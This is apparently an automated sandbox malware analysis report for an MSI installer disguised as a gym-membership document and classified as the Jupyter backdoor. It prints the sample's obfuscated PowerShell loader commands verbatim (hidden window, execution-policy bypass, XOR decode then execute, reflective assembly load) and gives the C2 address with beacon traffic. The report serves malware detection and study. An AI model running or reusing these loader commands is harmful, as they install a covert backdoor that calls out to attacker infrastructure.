Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Nyship-Empire-Plan-Gym-Membership.msi

Overview

General Information

Sample Name:Nyship-Empire-Plan-Gym-Membership.msi
Analysis ID:496721
MD5:f6118522893f3cd95198527d6f0282ba
SHA1:dd9b59d2553043a4740b9cd557c7dde0740050cf
SHA256:5cf24553e521de102628e1ebdadb69a6623904f08b51cf5b1ea14779e03e8682
Infos:

Most interesting Screenshot:

Detection

Jupyter
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Jupyter backdoor
Yara detected Powershell dedcode and execute
Multi AV Scanner detection for submitted file
Sigma detected: Encoded FromBase64String
Sigma detected: Powershell Decrypt And Execute Base64 Data
Multi AV Scanner detection for dropped file
Sigma detected: FromBase64String Command Line
Bypasses PowerShell execution policy
Suspicious powershell command line found
Writes many files with high entropy
C2 URLs / IPs found in malware configuration
Powershell creates an autostart link
Queries the volume information (name, serial number etc) of a device
Yara signature match
Drops PE files to the application program directory (C:\ProgramData)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Stores files to the Windows start menu directory
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
PE file contains executable resources (Code or Archives)
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
PE file contains strange resources
Adds / modifies Windows certificates
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Creates a start menu entry (Start Menu\Programs\Startup)
Registers a DLL
PE / OLE file has an invalid certificate
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Checks for available system drives (often done to infect USB drives)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 6320 cmdline: 'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\Desktop\Nyship-Empire-Plan-Gym-Membership.msi' MD5: 4767B71A318E201188A0D0A420C8B608)
  • msiexec.exe (PID: 4660 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
    • msiexec.exe (PID: 5732 cmdline: C:\Windows\System32\MsiExec.exe -Embedding B7C7A506E4E2E0AFFC1F9F29629DA729 C MD5: 4767B71A318E201188A0D0A420C8B608)
    • msiexec.exe (PID: 6024 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 9EA879A27423DE072DACED38067EC0CA MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
    • msiexec.exe (PID: 6656 cmdline: C:\Windows\System32\MsiExec.exe -Embedding 9C2DD99C4B00F4D44E912718317921B1 MD5: 4767B71A318E201188A0D0A420C8B608)
      • PDFsamEnhanced7Installer.exe (PID: 616 cmdline: 'C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe' MD5: 801B1B11E979AF812CA4387E5F438AD8)
        • regsvr32.exe (PID: 6964 cmdline: regsvr32.exe /s 'C:\ProgramData\PDFsam Enhanced 7\Installation\Statistics.dll' MD5: 426E7499F6A7346F0410DEAD0805586B)
        • PDFsam_Enhanced_7_Installer.exe (PID: 7016 cmdline: 'C:\ProgramData\PDFsam Enhanced 7\Installation\PDFsam_Enhanced_7_Installer.exe' /RegServer MD5: 801B1B11E979AF812CA4387E5F438AD8)
      • powershell.exe (PID: 2212 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;' MD5: 95000560239032BC68B4C2FDFCDEF913)
        • conhost.exe (PID: 2340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • powershell.exe (PID: 6916 cmdline: 'PowerShell.exe' -WINDOWsTyLe HIdden -Ep bYPass -CoMmaND '$ac46caf9ffc4c7b839941d3e2c350='QFVuLWVAczZMYUB0QiZiXk5FK1leUlRSPT81TUh2cFBRS1NtV1FKOG4hMjl4Z3I9NEF0ZkdxWHQlI0tLZn14UHt1YX1QVG9+d0BXdjZHPGxsYXopXlIxPGVeb0BhYD1id1Zgc0swXm5nT1FCI3RjLSo3ai1SM01xbVBhQW9gSUN9cDB9e19mUUZwJXJrYlBsai1JbWZ6bFhjPnBOekVlamsxflp1OWQwcmZzQkxqdEQyP3BqLTkzUnl7P3x+ZnVObzl2V2tpR3dTdSh0Z3stPg==';$aae4ceb7c424279fcf464cdcde86d=[sYstem.iO.FIle]::reaDAllbYTes('C:\Users\user\AppData\Roaming\MICroSoFT\UkpPOYBgmRz\KsTLyOZYmIAkr.IKlPnJSyzYBUXe');fOr($aef4ae006e446f92dc4680e0da252=0;$aef4ae006e446f92dc4680e0da252 -LT $aae4ceb7c424279fcf464cdcde86d.count;){For($a4e46636d5944397119672019e333=0;$a4e46636d5944397119672019e333 -LT $ac46caf9ffc4c7b839941d3e2c350.LenGtH;$a4e46636d5944397119672019e333++){$aae4ceb7c424279fcf464cdcde86d[$aef4ae006e446f92dc4680e0da252]=$aae4ceb7c424279fcf464cdcde86d[$aef4ae006e446f92dc4680e0da252] -bxoR $ac46caf9ffc4c7b839941d3e2c350[$a4e46636d5944397119672019e333];$aef4ae006e446f92dc4680e0da252++;IF($aef4ae006e446f92dc4680e0da252 -GE $aae4ceb7c424279fcf464cdcde86d.coUNT){$a4e46636d5944397119672019e333=$ac46caf9ffc4c7b839941d3e2c350.lenGtH}}};[sYsTeM.ReflEcTIon.asseMbLy]::lOAd($aae4ceb7c424279fcf464cdcde86d);[a58b92819f74a08223fbd41c9efcf.a081375717c4dabd0e9d5ff272624]::a2311544abd4fcba55524af320681()' MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Jupyter Backdoor

{"Version": "OC-1", "C2 url": "http://146.70.41.157"}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Nyship-Empire-Plan-Gym-Membership.msiJoeSecurity_PowershellDedcodeAndExecuteYara detected Powershell dedcode and executeJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Documents\20211004\PowerShell_transcript.377142.wm8KM1k2.20211004212820.txtJoeSecurity_PowershellDedcodeAndExecuteYara detected Powershell dedcode and executeJoe Security
      C:\Windows\Installer\MSI113A.tmpJoeSecurity_PowershellDedcodeAndExecuteYara detected Powershell dedcode and executeJoe Security
        C:\Windows\Installer\5206a8.msiJoeSecurity_PowershellDedcodeAndExecuteYara detected Powershell dedcode and executeJoe Security
          C:\Windows\Installer\5206aa.msiJoeSecurity_PowershellDedcodeAndExecuteYara detected Powershell dedcode and executeJoe Security

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000015.00000002.991996984.00000273C9B50000.00000004.00020000.sdmpJoeSecurity_JupyterYara detected Jupyter backdoorJoe Security
              00000009.00000003.740405887.000001B512853000.00000004.00000001.sdmpSUSP_LNK_SuspiciousCommandsDetects LNK file with suspicious contentFlorian Roth
              • 0x90be:$s4: -ep bypass
              • 0x5cd96:$s4: -ep bypass
              • 0xb0a6e:$s4: -ep bypass
              • 0x104746:$s4: -ep bypass
              • 0x15841e:$s4: -ep bypass
              • 0x8ad4:$s12: WscrIPT.sHell
              • 0x32ea0:$s12: WscrIPT.sHell
              • 0x5c7ac:$s12: WscrIPT.sHell
              • 0x86b78:$s12: WscrIPT.sHell
              • 0xb0484:$s12: WscrIPT.sHell
              • 0xda850:$s12: WscrIPT.sHell
              • 0x10415c:$s12: WscrIPT.sHell
              • 0x12e528:$s12: WscrIPT.sHell
              • 0x157e34:$s12: WscrIPT.sHell
              • 0x182200:$s12: WscrIPT.sHell
              00000009.00000003.749058298.000001B512853000.00000004.00000001.sdmpSUSP_LNK_SuspiciousCommandsDetects LNK file with suspicious contentFlorian Roth
              • 0x90be:$s4: -ep bypass
              • 0x88246:$s4: -ep bypass
              • 0xdbf1e:$s4: -ep bypass
              • 0x12fbf6:$s4: -ep bypass
              • 0x1838ce:$s4: -ep bypass
              • 0x8ad4:$s12: WscrIPT.sHell
              • 0x32ea0:$s12: WscrIPT.sHell
              • 0x5c7ac:$s12: WscrIPT.sHell
              • 0x5d270:$s12: WscrIPT.sHell
              • 0xb2028:$s12: WscrIPT.sHell
              • 0xdb934:$s12: WscrIPT.sHell
              • 0x105d00:$s12: WscrIPT.sHell
              • 0x12f60c:$s12: WscrIPT.sHell
              • 0x1599d8:$s12: WscrIPT.sHell
              • 0x1832e4:$s12: WscrIPT.sHell
              • 0x1ad6b0:$s12: WscrIPT.sHell
              00000015.00000002.946342181.00000273B17C0000.00000004.00000001.sdmpJoeSecurity_JupyterYara detected Jupyter backdoorJoe Security
                00000009.00000003.739854732.000001B512853000.00000004.00000001.sdmpSUSP_LNK_SuspiciousCommandsDetects LNK file with suspicious contentFlorian Roth
                • 0x90be:$s4: -ep bypass
                • 0x5cd96:$s4: -ep bypass
                • 0xb0a6e:$s4: -ep bypass
                • 0x104746:$s4: -ep bypass
                • 0x15841e:$s4: -ep bypass
                • 0x8ad4:$s12: WscrIPT.sHell
                • 0x32ea0:$s12: WscrIPT.sHell
                • 0x5c7ac:$s12: WscrIPT.sHell
                • 0x86b78:$s12: WscrIPT.sHell
                • 0xb0484:$s12: WscrIPT.sHell
                • 0xda850:$s12: WscrIPT.sHell
                • 0x10415c:$s12: WscrIPT.sHell
                • 0x12e528:$s12: WscrIPT.sHell
                • 0x157e34:$s12: WscrIPT.sHell
                • 0x182200:$s12: WscrIPT.sHell
                Click to see the 6 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                21.2.powershell.exe.273b1806fc8.0.unpackJoeSecurity_JupyterYara detected Jupyter backdoorJoe Security
                  21.2.powershell.exe.273b1806fc8.0.raw.unpackJoeSecurity_JupyterYara detected Jupyter backdoorJoe Security
                    21.2.powershell.exe.273c9b50000.1.raw.unpackJoeSecurity_JupyterYara detected Jupyter backdoorJoe Security
                      21.2.powershell.exe.273c9b50000.1.unpackJoeSecurity_JupyterYara detected Jupyter backdoorJoe Security

                        Sigma Overview

                        System Summary:

                        barindex
                        Sigma detected: Encoded FromBase64StringShow sources
                        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\MsiExec.exe -Embedding 9C2DD99C4B00F4D44E912718317921B1, ParentImage: C:\Windows\System32\msiexec.exe, ParentProcessId: 6656, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', ProcessId: 2212
                        Sigma detected: FromBase64String Command LineShow sources
                        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\MsiExec.exe -Embedding 9C2DD99C4B00F4D44E912718317921B1, ParentImage: C:\Windows\System32\msiexec.exe, ParentProcessId: 6656, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', ProcessId: 2212
                        Sigma detected: Non Interactive PowerShellShow sources
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\MsiExec.exe -Embedding 9C2DD99C4B00F4D44E912718317921B1, ParentImage: C:\Windows\System32\msiexec.exe, ParentProcessId: 6656, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', ProcessId: 2212
                        Sigma detected: T1086 PowerShell ExecutionShow sources
                        Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132778492979659065.2212.DefaultAppDomain.powershell

                        Data Obfuscation:

                        barindex
                        Sigma detected: Powershell Decrypt And Execute Base64 DataShow sources
                        Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\MsiExec.exe -Embedding 9C2DD99C4B00F4D44E912718317921B1, ParentImage: C:\Windows\System32\msiexec.exe, ParentProcessId: 6656, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', ProcessId: 2212

                        Jbx Signature Overview

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection:

                        barindex
                        Found malware configurationShow sources
                        Source: 21.2.powershell.exe.273b1806fc8.0.raw.unpackMalware Configuration Extractor: Jupyter Backdoor {"Version": "OC-1", "C2 url": "http://146.70.41.157"}
                        Multi AV Scanner detection for submitted fileShow sources
                        Source: Nyship-Empire-Plan-Gym-Membership.msiVirustotal: Detection: 12%Perma Link
                        Multi AV Scanner detection for dropped fileShow sources
                        Source: C:\ProgramData\PDFsam Enhanced 7\Installation\PDFsam_Enhanced_7_Installer.exeReversingLabs: Detection: 20%
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeReversingLabs: Detection: 20%
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----
                        Source: C:\Windows\System32\msiexec.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{92DEF4EC-9A2A-492B-8CB2-EA5C3D67E621}Jump to behavior
                        Source: unknownHTTPS traffic detected: 64.15.159.234:443 -> 192.168.2.4:49785 version: TLS 1.2
                        Source: Binary string: ?crypto\stack\stack.ccompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASMcrypto\ex_data.c source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmp
                        Source: Binary string: D:\TemporaryBuilds\installer_builder_1\66\s\_bin\pdfsam7\Win32\Statistics.pdb> source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmp
                        Source: Binary string: D:\TemporaryBuilds\installer_builder_1\66\s\_bin\pdfsam7\Win32\PDFsam_Enhanced_7_Installer.pdb source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmp
                        Source: Binary string: D:\TemporaryBuilds\installer_builder_1\66\s\_bin\pdfsam7\Win32\Statistics.pdb source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmp
                        Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                        Source: C:\Windows\System32\conhost.exeFile opened: c:
                        Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

                        Networking:

                        barindex
                        C2 URLs / IPs found in malware configurationShow sources
                        Source: Malware configuration extractorURLs: http://146.70.41.157
                        Source: Joe Sandbox ViewASN Name: TENET-1ZA TENET-1ZA
                        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 313Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 509
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 415
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 675
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 612
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 640
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 600
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 474
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 464
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 705
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 721
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 322
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 665
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 277
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 653
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 443
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 674
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 609
